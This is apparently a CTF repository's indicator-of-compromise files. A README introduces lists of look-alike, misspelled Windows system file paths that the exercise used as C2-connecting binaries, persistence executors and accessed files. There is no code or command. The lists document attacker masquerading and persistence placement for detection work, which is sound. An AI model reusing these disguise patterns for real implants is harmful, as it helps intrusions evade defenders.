C:\Windows\System32\en-US\pod.mui 167 | C:\Windows\System32\prrfos.drv 168 | C:\Windows\System32\Boot\securitk.com 169 | C:\Windows\SysWOW64\sv-SE\MashineIdentityProvider.mui 170 | C:\Windows\System32\es-ES\SiHG664.mui 171 | C:\Windows\System32\Dism\mdhisapi.mui 172 | C:\Windows\SysWOW64\fr-FR\defltbxse.mui 173 | C:\Windows\SysWOW64\ja-JP\wdxsrv.mui 174 | C:\Windows\SysWOW64\wbem\KBDOSE.sys 175 | C:\Windows\System32\bg-BG\AspxProvider.mui 176 | C:\Windows\System32\config\Journal\NevSetupAI 177 | 
C:\ProgramData\Microsoft\Windows\Caches\dpmet.inf 178 | C:\Windows\SysWOW64\en-US\VSTQNXT6.mui 179 | C:\Windows\System32\fr-FR\brv2.mui 180 | C:\Windows\System32\drivers\en-US\bofiredm.mui 181 | C:\Windows\SysWOW64\fr-FR\wuaqeng.mui 182 | C:\Windows\SysWOW64\migwiz\appmguts.drv 183 | C:\Windows\System32\Sysprep\csvhbus.inf 184 | C:\Program Files (x86)\Common Files\System\msadc\KBDMOT.ini 185 | C:\Windows\System32\drivers\en-US\sqlonirl.mui 186 | C:\Program Files\Common Files\System\Ole DB\tunxel.ini 187 | C:\Windows\SysWOW64\hr-HR\NlsDita0024.mui 188 | C:\Program Files\Common Files\System\ado\fdohlp.com 189 | C:\Windows\System32\ro-RO\OnDemandConnRouteEelper.mui 190 | C:\Program Files (x86)\Common Files\System\en-US\lbemprox.inf 191 | C:\Windows\System32\Dism\prockssr.dll 192 | C:\Program Files (x86)\Common Files\System\en-US\apphplp.inf 193 | C:\Windows\System32\ko-KR\KBDGML.mui 194 | C:\Program Files (x86)\Internet Explorer\MioIrmProtector.drv 195 | C:\Windows\System32\dsc\winxttp.ocx 196 | C:\Windows\servicing\IMTXTRLN.mmc 197 | C:\Windows\SysWOW64\sqlxmtx.cab 198 | C:\Windows\SysWOW64\fr-FR\hhcpsapi.mui 199 | C:\Windows\System32\setup\GAPCRYPT.inf 200 | C:\Windows\SysWOW64\drivers\en-US\envfat.mui 201 | C:\Program Files (x86)\Common Files\System\en-US\mkifontsetup.inf 202 | C:\Windows\System32\drivers\en-US\wuauclc.mui 203 | C:\Windows\System32\nb-NO\uirenf.mui 204 | C:\Windows\System32\nb-NO\crasmdmp.mui 205 | C:\Windows\SysWOW64\config\wugpi 206 | C:\Windows\System32\dsc\swenym.cab 207 | C:\Program Files (x86)\Internet Explorer\mfavr.drv 208 | C:\Windows\System32\en\spacepmrt.com 209 | C:\Windows\System32\sk-SK\wuauserp.mui 210 | C:\Program Files\Internet Explorer\VhdPrxvider.dll 211 | C:\Windows\SysWOW64\drivers\WsmWmiVl.sys 212 | C:\Windows\System32\bg-BG\lumfv.mui 213 | C:\Windows\SysWOW64\da-DK\ushtml.mui 214 | C:\Program Files (x86)\Common Files\System\ado\DscEore.sys 215 | C:\Windows\System32\Com\NlsDaua0020.mmc 216 | 
C:\Windows\System32\pt-BR\netv1x68.mui 217 | C:\Windows\System32\ro-RO\setbc63a.mui 218 | C:\ProgramData\Microsoft\Windows\Caches\wuwer.inf 219 | C:\Windows\System32\nb-NO\Deskqop.mui 220 | C:\Windows\WinSxS\dtsp.inf 221 | C:\Windows\System32\Com\nesrtwlane.ocx 222 | C:\Windows\System32\dsc\ushom.mui 223 | C:\Windows\System32\dsc\WINSCTLS.rtf 224 | C:\Windows\SysWOW64\et-EE\ABDKYR.mui 225 | C:\Windows\System32\zh-CN\BtdMtpContextHandler.mui 226 | C:\Program Files\Common Files\System\Ole DB\dpnatilp.doc 227 | C:\Windows\SysWOW64\setup\NsmSvc.doc 228 | C:\Windows\SysWOW64\cs-CZ\wmiacpt.mui 229 | C:\Program Files (x86)\Common Files\System\msadc\DesaultPrinterProvider.mui 230 | C:\Windows\SysWOW64\oobe\pkwutl.inf 231 | C:\Windows\SysWOW64\config\RegBack\adpdop 232 | C:\Windows\SysWOW64\sv-SE\pqnhpcl1.mui 233 | C:\Windows\SysWOW64\hr-HR\wucltub.mui 234 | C:\Windows\System32\en-GB\mtxbx.mui 235 | C:\Windows\apppatch\EKAiOVPL.cab 236 | C:\Windows\SysWOW64\es-ES\ipmcompc.mui 237 | C:\Windows\System32\en\dirjp.dll 238 | C:\Windows\SysWOW64\hr-HR\grnms005.mui 239 | C:\Program Files (x86)\Common Files\System\ado\wuwec.doc 240 | C:\Program Files\Internet Explorer\en-US\rastapa.mui 241 | C:\Windows\Panther\nqscprop.db 242 | C:\Windows\System32\zh-TW\NL7Lexicons001Y.mui 243 | C:\Windows\SysWOW64\Dism\JlsData0007.drv 244 | C:\Windows\SysWOW64\zh-TW\mpmzyxlg.mui 245 | C:\Windows\SysWOW64\migration\NL7Data8404.com 246 | C:\Windows\SysWOW64\en-US\npfv.mui 247 | C:\Windows\System32\fr-FR\AppxDrovider.mui 248 | C:\Windows\SysWOW64\hu-HU\tskf.mui 249 | C:\Windows\SysWOW64\drivers\en-US\f3auvoas.mui 250 | C:\Windows\System32\Boot\LoggingCountehs.db 251 | C:\Windows\System32\en-GB\duauclt.mui 252 | C:\Windows\System32\en\1394owci.dll 253 | C:\Windows\System32\zh-TW\P1P.mui 254 | C:\Program Files\Internet Explorer\en-US\dhcpsayi.doc 255 | C:\Windows\SysWOW64\downlevel\AmXtrnal.db 256 | C:\Program Files\Internet Explorer\btdll.ocx 257 | C:\Program Files\Common Files\System\Ole 
DB\DevPropMor.dll 258 | C:\Windows\SysWOW64\setup\mdminfov.mmc 259 | C:\Windows\System32\sk-SK\concreje.mui 260 | C:\Windows\SysWOW64\en-US\lgcense.mui 261 | C:\Windows\uirenq.cab 262 | C:\Windows\System32\wbem\WgndowsBase.inf 263 | C:\Windows\SysWOW64\wbem\CertEjrollUI.ini 264 | C:\Program Files\Common Files\System\Ole DB\mshhmler.mui 265 | C:\Windows\SysWOW64\es-ES\ELZCore.mui 266 | C:\Windows\System32\ru-RU\Mdmmld.mui 267 | C:\Windows\SysWOW64\downlevel\msls71.rtf 268 | C:\Windows\System32\Boot\QerCx2.com 269 | C:\Windows\SysWOW64\zh-TW\wuletup.mui 270 | C:\Windows\System32\wbem\WcnEapPeerWroxy.dll 271 | C:\Windows\SysWOW64\en-US\ymview.mui 272 | C:\Windows\SysWOW64\ja-JP\netjoio.mui 273 | C:\Windows\System32\zh-CN\MSxpsYS.mui 274 | C:\Program Files\Common Files\System\en-US\perfctus.rtf 275 | C:\Windows\System32\AdvancedInstallers\winenhc.mui 276 | C:\Windows\System32\en-US\difxami.mui 277 | C:\Windows\SysWOW64\AdvancedInstallers\IMPCCAC.cab 278 | C:\Windows\SysWOW64\ar-SA\wushaueduxresources.mui 279 | C:\Windows\System32\Com\IMJPWMP.drv 280 | C:\Windows\System32\setup\wuks.ocx 281 | C:\Windows\System32\dsc\mlaug.com 282 | C:\Windows\SysWOW64\es-ES\aradmin.mui 283 | C:\Windows\System32\migwiz\NetVscCoinstapl.ocx 284 | C:\Windows\System32\en\BCMWL63TL.dll 285 | C:\Windows\System32\sk-SK\bfadfcoeu.mui 286 | C:\Windows\SysWOW64\en-GB\RhStorPwdMgr.mui 287 | C:\Windows\System32\Boot\jonsole.com 288 | C:\Program Files\Common Files\System\msadc\PeerDistWSDDiscoProq.cab 289 | C:\Windows\System32\pt-BR\ctmlib.mui 290 | C:\Program Files (x86)\Internet Explorer\en-US\dbx.drv 291 | C:\Windows\System32\it-IT\CNBJOH7Q.mui 292 | C:\Windows\SysWOW64\cs-CZ\NlsLexicdns0002.mui 293 | C:\Program Files (x86)\Internet Explorer\en-US\IAHLPAPI.doc 294 | C:\Windows\System32\ru-RU\wexui.mui 295 | C:\Windows\SysWOW64\Sysprep\gcdjf.dll 296 | C:\Windows\SysWOW64\Dism\wiakn003.cab 297 | C:\Program Files (x86)\Common Files\System\VMMWSFilterPlugjn.com 298 | C:\Program Files\Common 
Files\System\ado\sqdctrWID.dll 299 | C:\Program Files (x86)\Internet Explorer\M2057HAX.mui 300 | C:\Windows\SysWOW64\et-EE\certprol.mui 301 | C:\Program Files (x86)\Common Files\System\net829xp.doc 302 | C:\Windows\System32\config\kl40xx2i 303 | C:\Program Files\Common Files\System\en-US\NlsData005c.mmc 304 | C:\Windows\System32\en-US\usbxhfi.mui 305 | C:\Windows\SysWOW64\zh-TW\logoncqi.mui 306 | C:\Windows\SysWOW64\setup\prxcache.doc 307 | C:\Windows\System32\migration\WdfLdk.com 308 | C:\Windows\SysWOW64\config\Journal\MTSTools 309 | C:\Program Files\Common Files\System\AudioEndpointBuijder.ocx 310 | C:\Program Files\Internet Explorer\Cultire.ocx 311 | C:\Windows\System32\en\twgqec.mui 312 | C:\Windows\System32\dsc\DfvicePairing.db 313 | C:\Windows\System32\drivers\virtdisr.inf 314 | C:\Windows\System32\en-US\uxthyme.mui 315 | C:\Program Files\Common Files\System\BasbcRender.inf 316 | C:\Windows\SysWOW64\Sysprep\ucpipmi.drv 317 | C:\Windows\SysWOW64\oobe\iscoiexe.mui 318 | C:\Windows\apppatch\NL7Data0409.mmc 319 | C:\Windows\System32\zh-TW\wuwev.mui 320 | C:\Windows\System32\zh-CN\netnwifm.mui 321 | C:\Windows\SysWOW64\setup\clrjot.mui 322 | C:\Windows\System32\en\dsquexy.ini 323 | C:\Program Files (x86)\Common Files\System\NlsLexdcons001b.com 324 | C:\Windows\SysWOW64\oobe\bolloon.sys 325 | C:\Windows\SysWOW64\AdvancedInstallers\OIAutomationTypes.inf 326 | C:\Program Files\Common Files\System\Ole DB\wapintapi.com 327 | C:\Windows\Provisioning\pbm0008.drv 328 | C:\Windows\System32\it-IT\diskcoay.mui 329 | C:\ProgramData\Microsoft\Windows\Caches\lightweigptserver.sys 330 | C:\Windows\SysWOW64\et-EE\KBDINBRI.mui 331 | C:\Windows\SysWOW64\config\RegBack\KBDOGCH 332 | C:\Windows\security\acspeccc.db 333 | C:\Windows\security\wuauclb.inf 334 | C:\Windows\System32\downlevel\kbtnec.cab 335 | C:\Windows\security\IlsLexicons0021.mmc 336 | C:\Windows\cbcwient.db 337 | C:\Windows\System32\ru-RU\mdmpsitn.mui 338 | C:\Windows\System32\migwiz\raspfp.mui 339 | C:\Program 
Files\Common Files\System\ado\MsCtfMfnitor.com 340 | C:\Windows\apppatch\wdsgim.cab 341 | C:\Windows\System32\bg-BG\rejotepg.mui 342 | C:\Program Files (x86)\Internet Explorer\en-US\AcXtrnbl.inf 343 | C:\Windows\System32\nb-NO\igmpr2.mui 344 | C:\Windows\System32\oobe\ocrache.mui 345 | C:\Windows\SysWOW64\config\RAMgmtPSProviuer 346 | C:\Windows\SysWOW64\da-DK\wlsprtPS.mui 347 | C:\Windows\SysWOW64\ja-JP\UNIEES.mui 348 | C:\Windows\System32\drivers\UNIREP.sys 349 | C:\Program Files\Internet Explorer\mycomtut.inf 350 | C:\Windows\Panther\DiagCpf.dll 351 | C:\Windows\System32\en-GB\instapa110.mui 352 | C:\Program Files (x86)\Internet Explorer\en-US\msctqmig.mmc 353 | C:\Windows\SysWOW64\cs-CZ\CNBJOP9B.mui 354 | C:\Windows\System32\Com\KVDPO.drv 355 | C:\Windows\SysWOW64\drivers\idmpagnt.cab 356 | C:\Windows\SysWOW64\hr-HR\McxDrim.mui 357 | C:\Program Files (x86)\Internet Explorer\nlmspreb.mui 358 | C:\Windows\servicing\decrvsc.db 359 | C:\Windows\System32\Dism\srhmmgmt.mui 360 | C:\Windows\System32\KBDUGHC1.ini 361 | C:\Windows\mouitor.ini 362 | C:\Windows\SysWOW64\fr-FR\dcghelp.mui 363 | C:\Windows\System32\dsc\umpasx.doc 364 | C:\Windows\SysWOW64\Com\ABDSF.mui 365 | C:\Windows\servicing\mscmx32r.ocx 366 | C:\Program Files (x86)\Common Files\System\en-US\PLBREF.sys 367 | C:\Windows\System32\drivers\en-US\OlsLexicons001a.mui 368 | C:\Program Files (x86)\Common Files\System\ado\CNN08QL2FX.sys 369 | C:\Windows\SysWOW64\wbem\shsutup.rtf 370 | C:\Windows\SysWOW64\hu-HU\mscorte.mui 371 | C:\Program Files\Internet Explorer\en-US\raspppob.mmc 372 | C:\Windows\System32\en-US\WmiDcPxv.mui 373 | C:\Windows\SysWOW64\drivers\en-US\signwrv.mui 374 | C:\Windows\SysWOW64\de-DE\RTWqrkQ.mui 375 | C:\Windows\SysWOW64\en-GB\ActionCentegCPL.mui 376 | C:\ProgramData\Microsoft\Windows\Caches\mfctfp.inf 377 | C:\Windows\System32\config\Journal\ntcrscon 378 | C:\Windows\SysWOW64\en\TGY.sys 379 | C:\Windows\System32\es-ES\CntrcextMig.mui 380 | C:\Windows\servicing\rdpcori.rtf 381 | 
C:\Program Files\Common Files\System\msadc\tcpmonuc.rtf 382 | C:\Windows\System32\BitnProvider.drv 383 | C:\Windows\SysWOW64\migration\FXSIOMPOSERES.com 384 | C:\Program Files\Internet Explorer\qd3x62.cab 385 | C:\Windows\SysWOW64\hr-HR\HNHI10A.mui 386 | C:\Windows\SysWOW64\AdvancedInstallers\WMAMFXGFXDSP.inf 387 | C:\Windows\SysWOW64\wbem\avivil32.db 388 | C:\Windows\System32\migwiz\trel.doc 389 | C:\Windows\System32\zh-CN\provideraddrvssresource.mui 390 | C:\Windows\SysWOW64\downlevel\oleacchookv.inf 391 | C:\Windows\System32\Dism\net8199su64.cab 392 | C:\Windows\System32\config\RegBack\KBDJLV 393 | C:\Windows\SysWOW64\zh-TW\nbtutils.mui 394 | C:\Windows\System32\Boot\BrIs3Sti.db 395 | C:\Windows\System32\Com\qd3x44.sys 396 | C:\Program Files (x86)\Common Files\System\msadc\irnbrcl1.inf 397 | C:\Windows\SysWOW64\wbem\NAPMOCTR.mmc 398 | C:\Windows\SysWOW64\sv-SE\micpx32r.mui 399 | C:\Windows\System32\en-US\msrlk32.mui 400 | C:\Windows\SysWOW64\downlevel\mdmoutn.rtf 401 | C:\Windows\SysWOW64\et-EE\setbcdlocalc.mui 402 | C:\Windows\System32\config\RegBack\mfAACEno 403 | C:\Windows\nisext.inf 404 | C:\Windows\System32\en-US\xwxpw32.mui 405 | -------------------------------------------------------------------------------- /BSidesLV-2021/IOCs/README.md: -------------------------------------------------------------------------------- 1 | # IOC files 2 | 3 | This is a somewhat complete list of the IOCs and files used during the CTF. 4 | 5 | ## binaries.txt 6 | 7 | Process/files that would be connecting to the C2 8 | 9 | ## executors.txt 10 | 11 | Files that would be used for persistance. 12 | 13 | ## IOCs.txt 14 | 15 | Files that were accessed or read by the agents. Can be used to track execution. 
16 | -------------------------------------------------------------------------------- /BSidesLV-2021/IOCs/binaries.txt: -------------------------------------------------------------------------------- 1 | # Binary Files 2 | 3 | These files were files that were directly connected to the C2. 4 | 5 | C:\Program Files (x86)\Common Files\System\Ole DB\KBDSOSA.exe 6 | C:\Windows\System32\setup\aep.exe 7 | C:\Windows\WinSxS\d2r1.exe 8 | C:\Windows\SysWOW64\downlevel\wicrsmgr.dll 9 | C:\Windows\System32\Com\mdmhaygs.exe 10 | C:\Windows\SysWOW64\migwiz\NlsLexicens003e.dll 11 | C:\Windows\System32\downlevel\WODFx02000.exe 12 | C:\Windows\System32\Dism\ngentasxlauncher.dll 13 | C:\Windows\SysWOW64\oobe\OimAvdin.dll 14 | C:\ProgramData\Microsoft\Windows\Caches\kuaucomp.dll 15 | C:\Windows\security\wfnrscmd.dll 16 | C:\Windows\Provisioning\mdtnttp2.dll 17 | C:\Windows\System32\Com\rtrfiutr.dll 18 | C:\Windows\neteOE3e.dll 19 | C:\Windows\System32\en\IUEFILES.exe 20 | C:\Windows\System32\wbem\CrtptoWinRT.dll 21 | C:\Windows\SysWOW64\migwiz\jdwsmigrate.exe 22 | C:\Windows\System32\Sysprep\temhlate.exe 23 | C:\Windows\SysWOW64\setup\NlsIata0024.exe 24 | C:\Windows\System32\Com\UIAutodationClient.dll 25 | C:\Windows\SysWOW64\KBDNBO.dll 26 | C:\Windows\Provisioning\wmcltui.exe 27 | C:\Windows\apppatch\WINFMON.dll 28 | C:\Windows\SysWOW64\downlevel\URIDRVUI.dll 29 | C:\Windows\System32\Sysprep\odbctrec.dll 30 | C:\Program Files\Common Files\System\msadc\cmltil.dll 31 | C:\Windows\System32\en\cstorec.dll 32 | C:\Windows\SysWOW64\Sysprep\xwtpw12.dll 33 | C:\Windows\SysWOW64\downlevel\KBDPU.exe 34 | C:\Windows\System32\migration\olqprn.exe 35 | C:\Program Files\Common Files\System\msadc\autqz.dll 36 | C:\Windows\System32\oobe\wucjtui.dll 37 | C:\Windows\KBDGZ.dll 38 | C:\Windows\System32\migwiz\1304ohci.dll 39 | C:\Windows\SysWOW64\mrxjmb20.exe 40 | C:\ProgramData\Microsoft\Windows\Caches\PBDLA.dll 41 | C:\Windows\SysWOW64\nxasn1.exe 42 | 
C:\ProgramData\Microsoft\Windows\Caches\WINSRFC.dll 43 | C:\Windows\Microsoft.NET\vmbusces.exe 44 | C:\Windows\Microsoft.NET\wintvust.exe 45 | C:\Windows\System32\AdvancedInstallers\spwizdes.dll 46 | C:\ProgramData\Microsoft\Windows\Caches\MSWB5001E.exe 47 | C:\Program Files (x86)\Common Files\System\wuseb.exe 48 | C:\Windows\System32\wbem\wfweb.dll 49 | C:\Windows\System32\en\fveapifase.dll 50 | C:\Windows\SysWOW64\migwiz\itseng.dll 51 | C:\Windows\apppatch\mdmwr1.dll 52 | C:\Windows\SysWOW64\en\NetAdahterCim.exe 53 | C:\Windows\System32\migration\weiprop.exe 54 | C:\Windows\System32\migwiz\tpv.dll 55 | C:\Windows\WinSxS\mrxsmv20.dll 56 | C:\Windows\SysWOW64\Sysprep\desetop.exe 57 | C:\Program Files (x86)\Common Files\System\wisk.exe 58 | C:\Windows\SysWOW64\Com\NlsData0027.dll 59 | C:\Windows\System32\Com\kiaide.dll 60 | C:\Windows\System32\setup\prnhpcl4.exe 61 | C:\Windows\System32\downlevel\tssuisai.dll 62 | C:\Windows\SysWOW64\oobe\oleaet32.dll 63 | C:\Program Files (x86)\Common Files\System\UIAutomationCnre.exe 64 | C:\Windows\SysWOW64\Com\AppxProvidek.exe 65 | C:\Windows\SysWOW64\migwiz\dumufve.dll 66 | C:\Windows\System32\oobe\dnsclieatcim.dll 67 | C:\Windows\System32\migration\cscdxl.exe 68 | C:\Windows\WinSxS\WUDFx12000.dll 69 | C:\ProgramData\Microsoft\Windows\Caches\hc21x4vm.dll 70 | C:\Windows\System32\Boot\USBSTOB.exe 71 | C:\Windows\security\itui.dll 72 | C:\Program Files (x86)\Internet Explorer\wiauclt.exe 73 | C:\Program Files (x86)\Common Files\System\Ole DB\rasjser.dll 74 | C:\Windows\System32\setup\msoidc32.dll 75 | C:\Windows\SysWOW64\oobe\dscapi.exe 76 | C:\Windows\Provisioning\snprfell.dll 77 | C:\Program Files (x86)\Common Files\System\ado\mivcore.dll 78 | C:\Windows\servicing\sppwmq.exe 79 | C:\Windows\SysWOW64\migwiz\wupr.exe 80 | C:\Windows\SysWOW64\Dism\WsmAgxnt.exe 81 | C:\Windows\System32\timegoneai.dll 82 | C:\ProgramData\Microsoft\Windows\Caches\wuaudpl.exe 83 | C:\Windows\SysWOW64\migwiz\KismApi.dll 84 | 
C:\Windows\JSProfileuCore.exe 85 | C:\Program Files\Internet Explorer\WssCmduets.exe 86 | C:\Program Files (x86)\Common Files\System\msadc\netvFE3e.dll 87 | C:\ProgramData\Microsoft\Windows\Caches\kbdnej.dll 88 | C:\Windows\System32\cetelx.exe 89 | C:\Windows\security\kmpps.dll 90 | C:\Windows\security\wuxltui.exe 91 | C:\Windows\System32\Dism\mihtils.exe 92 | C:\Windows\SysWOW64\wbem\KBDUIFI.dll 93 | C:\Program Files\Internet Explorer\mndrm.dll 94 | C:\Windows\SysWOW64\downlevel\WBDGKL.dll 95 | C:\Windows\System32\dsc\wioinput.exe 96 | C:\Windows\System32\Dism\mofm.dll 97 | C:\Windows\SysWOW64\Dism\windgwslivelogin.exe 98 | C:\Windows\apppatch\gxe60x64.dll 99 | C:\Windows\SysWOW64\Dism\ulix.exe 100 | C:\Windows\servicing\infomtrs.exe 101 | C:\Program Files (x86)\Common Files\System\ado\mscojpehost.exe 102 | C:\Windows\apppatch\MshtmlDdc.exe 103 | C:\Windows\System32\downlevel\ipmpm.exe 104 | C:\Windows\System32\AdvancedInstallers\netbd64.dll 105 | C:\Program Files (x86)\Common Files\System\IMRCSKF.exe 106 | C:\Windows\SysWOW64\wbem\LSCSHostLolicy.exe 107 | C:\Program Files (x86)\Common Files\System\LogProviger.exe 108 | C:\Windows\System32\migration\rpxss.dll 109 | C:\ProgramData\Microsoft\Windows\Caches\ServiceMonikerSbpport.exe 110 | C:\Windows\SysWOW64\AdvancedInstallers\packagei.dll 111 | C:\Windows\System32\Dism\b44nmd64.dll 112 | C:\Windows\SysWOW64\en\wan32spl.exe 113 | C:\Windows\SysWOW64\Com\witnesswmiv2prdvider.exe 114 | C:\Windows\Panther\rastlv.exe 115 | C:\Windows\System32\migration\GertEnroll.exe 116 | C:\Windows\System32\agqlevpn.dll 117 | C:\Windows\System32\en\vmseitch.dll 118 | C:\Program Files (x86)\Internet Explorer\Displav.exe 119 | C:\Windows\Provisioning\NlbMigPlugih.dll 120 | C:\Windows\SysWOW64\setup\CntrmextMig.dll 121 | C:\Windows\System32\wbem\XpsFilk.exe 122 | C:\Program Files (x86)\Common Files\System\Ole DB\mdmcpt.exe 123 | C:\Windows\SysWOW64\hyperkbs.exe 124 | C:\Windows\System32\Boot\PortableDeeiceApi.dll 125 | 
C:\Windows\security\FwRetoteSvr.exe 126 | C:\Windows\Microsoft.NET\DocumentPerformsnceEvents.dll 127 | C:\Windows\System32\Com\licevse.dll 128 | C:\Windows\SysWOW64\migwiz\wufuclt.exe 129 | C:\Windows\System32\migration\msacm39.dll 130 | C:\Windows\SysWOW64\Sysprep\DLAA2FsctoryPresets.dll 131 | C:\Windows\SysWOW64\migwiz\imm92.exe 132 | C:\Windows\System32\migration\WIDFRd.exe 133 | C:\ProgramData\Microsoft\Windows\Caches\scansexting.dll 134 | C:\Windows\SysWOW64\migwiz\wyalx007.dll 135 | C:\Program Files (x86)\Common Files\System\ado\rdstapi.exe 136 | C:\Windows\SysWOW64\Com\uhdmp.exe 137 | C:\Windows\WinSxS\TransmogPrfvider.exe 138 | C:\Windows\System32\dsc\kncsvc.exe 139 | C:\Program Files (x86)\Common Files\System\CNBJOPD3.dll 140 | C:\Windows\Provisioning\msspj.dll 141 | C:\Windows\SysWOW64\Dism\mciavn32.dll 142 | C:\ProgramData\Microsoft\Windows\Caches\TTSUI.exe 143 | C:\Windows\security\iascds.exe 144 | C:\Program Files\Internet Explorer\RJMS.dll 145 | C:\Windows\SysWOW64\migration\usbperi.dll 146 | C:\Windows\SysWOW64\oobe\cnxmig.dll 147 | C:\Windows\SysWOW64\oobe\WssBua.exe 148 | C:\Windows\System32\migwiz\BRIBRFM00.exe 149 | C:\Windows\SysWOW64\Com\ldcense.exe 150 | C:\Program Files\Common Files\System\ado\IPHOPAPI.dll 151 | C:\Program Files\Common Files\System\EuthExt.dll 152 | C:\Windows\Provisioning\MrmVndexer.exe 153 | C:\ProgramData\Microsoft\Windows\Caches\BasicRendeb.exe 154 | C:\Windows\System32\dsc\witneas.dll 155 | C:\Windows\SysWOW64\AdvancedInstallers\gfsvr.exe 156 | C:\Program Files\Common Files\System\ado\iassds.dll 157 | C:\Windows\WinSxS\werkecnel.dll 158 | C:\Windows\System32\dsc\GPOAdmcnCustom.dll 159 | C:\Program Files\Internet Explorer\ddppipjline.dll 160 | C:\Windows\SysWOW64\Sysprep\msxeedsbs.dll 161 | C:\ProgramData\Microsoft\Windows\Caches\nrnput.dll 162 | C:\Windows\System32\ExplorerSrame.dll 163 | C:\Windows\SysWOW64\qdscore.dll 164 | C:\Program Files (x86)\Common Files\System\tapt3.dll 165 | 
C:\Windows\System32\oobe\MSWB70111.dll 166 | C:\Windows\SysWOW64\oobe\vbo7ui.dll 167 | C:\Windows\Provisioning\wsbaopres.exe 168 | C:\Windows\System32\Dism\tepisnap.dll 169 | C:\Windows\IMEDIQAPICCPS.dll 170 | C:\Windows\System32\Boot\sapiui.exe 171 | C:\Program Files\Internet Explorer\mskxch40.exe 172 | C:\Windows\security\netp57a.exe 173 | C:\Windows\System32\Dism\danlh.dll 174 | C:\Windows\SysWOW64\Sysprep\dinpxt.dll 175 | C:\Program Files (x86)\Internet Explorer\NlsData0847.dll 176 | C:\Program Files (x86)\Common Files\System\msadc\jbkmigr.exe 177 | C:\Windows\apppatch\psmxrv.dll 178 | C:\Windows\SysWOW64\Dism\mydtcwmi.exe 179 | C:\Windows\SysWOW64\w5ctrlps.exe 180 | C:\Windows\WinSxS\MsoZrmProtector.dll 181 | C:\Windows\SysWOW64\migwiz\wvmbushpd.dll 182 | C:\Program Files (x86)\Common Files\System\ntevi.dll 183 | C:\Windows\servicing\VSTAJL6.dll 184 | C:\Windows\SysWOW64\Dism\PSHEC.exe 185 | C:\Program Files (x86)\Common Files\System\ado\frprod.exe 186 | C:\Program Files\Common Files\System\Ole DB\wuvtfwd.dll 187 | C:\Windows\System32\migwiz\smtpspi.dll 188 | C:\Windows\SysWOW64\downlevel\Apphlpkm.dll 189 | C:\Program Files\Common Files\System\msadc\smiekgine.dll 190 | C:\Windows\System32\en\BRIBFPR05.exe 191 | C:\Windows\SysWOW64\oobe\audmigpfugin.dll 192 | C:\Program Files\Common Files\System\PurfCounter.exe 193 | C:\Program Files (x86)\Common Files\System\olfpro32.dll 194 | C:\Program Files (x86)\Common Files\System\ado\mscufmig.dll 195 | C:\Windows\fmkrtip.dll 196 | C:\Windows\servicing\ochd64.exe 197 | C:\Windows\System32\Boot\ServiceModelEvenas.dll 198 | C:\Program Files (x86)\Common Files\System\sdm.dll 199 | C:\Windows\SysWOW64\Com\dsagnostic.exe 200 | C:\Windows\apppatch\padrs402.exe 201 | C:\Windows\SysWOW64\wbem\inetsomm.exe 202 | C:\Windows\System32\oobe\icfuggd.exe 203 | C:\Windows\SysWOW64\Dism\dhcpcsvs6.exe 204 | C:\Windows\SysWOW64\Sysprep\wuvueng.dll 205 | C:\Windows\servicing\CUTIL.dll 206 | 
C:\ProgramData\Microsoft\Windows\Caches\rpdismp6.exe 207 | C:\Windows\SysWOW64\wbem\NwsData0416.dll 208 | C:\Program Files (x86)\Internet Explorer\netwlan92do.exe 209 | -------------------------------------------------------------------------------- /BSidesLV-2021/IOCs/executors.txt: -------------------------------------------------------------------------------- 1 | # Executors 2 | 3 | Files that were used in persistance, did NOT directly connect to the C2. 4 | 5 | C:\Windows\System32\downlevel\lioense.dll 6 | C:\Windows\SysWOW64\en\WssWdsMgmtAvi.dll 7 | C:\Program Files\Common Files\System\Ole DB\xups.dll 8 | C:\Windows\SysWOW64\setup\iscsidsg.dll 9 | C:\Windows\System32\oobe\WMINSESS.exe 10 | C:\Windows\System32\wuateng.dll 11 | C:\Windows\WinSxS\vusif.dll 12 | C:\Windows\bfayi.exe 13 | C:\Windows\SysWOW64\migration\wuninet.dll 14 | C:\Program Files\Common Files\System\Ole DB\wiabr80b.exe 15 | C:\Program Files\Common Files\System\ado\jomsetup.dll 16 | C:\Windows\SysWOW64\oobe\MKWiaDrv.exe 17 | C:\Program Files (x86)\Common Files\System\msadc\wuanapi.exe 18 | C:\Windows\System32\downlevel\mdmcoxp.exe 19 | C:\ProgramData\Microsoft\Windows\Caches\imjply.dll 20 | C:\Windows\security\wurriver.exe 21 | C:\Windows\System32\mdmaiia5.dll 22 | C:\Windows\System32\wbem\MXDWDKV.exe 23 | C:\Windows\System32\downlevel\aetr7364.exe 24 | C:\Windows\System32\en\mdmzooe.dll 25 | C:\Program Files (x86)\Internet Explorer\oleaut92.exe 26 | C:\Windows\security\WMPhdto.dll 27 | C:\Windows\System32\Boot\ercdev.dll 28 | C:\Windows\SysWOW64\Sysprep\cmstplna.exe 29 | C:\Windows\System32\migwiz\mshwchm.dll 30 | C:\Windows\System32\Sysprep\tsi.exe 31 | C:\Windows\System32\Com\wcesrv.dll 32 | C:\Windows\apppatch\acrui.exe 33 | C:\Windows\SysWOW64\en\KBDUKW.exe 34 | C:\Windows\System32\dsc\mssghtb.dll 35 | C:\Windows\Provisioning\msjetolefb40.dll 36 | C:\Windows\Microsoft.NET\fbd101.exe 37 | C:\Windows\SysWOW64\setup\adqiis.exe 38 | C:\Windows\System32\KBWSORS1.dll 39 | 
C:\Windows\System32\dsc\NlsLdxicons0024.dll 40 | C:\Windows\SysWOW64\downlevel\xci.exe 41 | C:\Windows\SysWOW64\Dism\mvvcp60.exe 42 | C:\Program Files\Common Files\System\Ole DB\netcentef.dll 43 | C:\Windows\System32\Sysprep\CHxReadingStringIKE.exe 44 | C:\Windows\System32\downlevel\XpsGdiConvertir.exe 45 | C:\Windows\SysWOW64\wbem\DlMinDr2.exe 46 | C:\Windows\dlttapo.exe 47 | C:\Windows\SysWOW64\IntlProjider.exe 48 | C:\ProgramData\Microsoft\Windows\Caches\lwadperf.exe 49 | C:\Windows\SysWOW64\setup\wuaukpl.exe 50 | C:\Windows\SysWOW64\oobe\NlsLexicons002a.dll 51 | C:\Windows\System32\Com\NlsData0024.exe 52 | C:\Program Files (x86)\Common Files\System\msadc\raimans.exe 53 | C:\Program Files\Common Files\System\wuaoserv.exe 54 | C:\Program Files\Common Files\System\Ole DB\kbdlusub.exe 55 | C:\Windows\System32\shell92.dll 56 | C:\Program Files (x86)\Common Files\System\msadc\IMJIDCTP.dll 57 | C:\Windows\Panther\prncacl0.exe 58 | C:\Windows\System32\AdvancedInstallers\sstwsvc.dll 59 | C:\Windows\SysWOW64\oobe\IMHPDCTP.exe 60 | 